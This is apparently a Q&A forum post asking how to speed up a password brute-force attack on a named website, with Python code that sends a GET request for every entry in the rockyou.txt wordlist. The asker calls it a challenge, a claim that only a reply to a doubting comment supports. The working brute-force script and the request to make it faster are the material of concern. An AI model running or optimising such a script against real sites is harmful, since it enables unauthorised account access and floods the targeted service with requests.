# How to efficiently go through a list of passwords while sending requests to a website?

Tags: python-3.x

I am trying to brute force my way into a website: `funcompetition.ddns.net`. This website takes only passwords. To send a password through this, I need to put password parameters into the URL, such that the url will be `funcompetition.ddns.net?pass="some password"`.

I have tried to do it using the `Requests` module; however, going through the whole list will require around 32 hours to compute, because the list of passwords contains over 1 billion inputs.

Here is my code:

```
import requests
import time

file = open("rockyou.txt", "r", errors="ignore")

line_number = 1

initial_time = time.perf_counter_ns()
for lines in file:
    request = requests.get("http://funcompetition.ddns.net?pass=" + lines)
    print(str(line_number) + "." + lines)
    if request.status_code == requests.codes.ok:
        print("Found password in line " + line_number + ": " + lines)
        break
    line_number += 1
```

I should expect a password but nothing happened

Comment: This is a real thing?  A site encouraging you to send them potentially billions of requests as quickly as possible?

Comment: Well, its a challenge.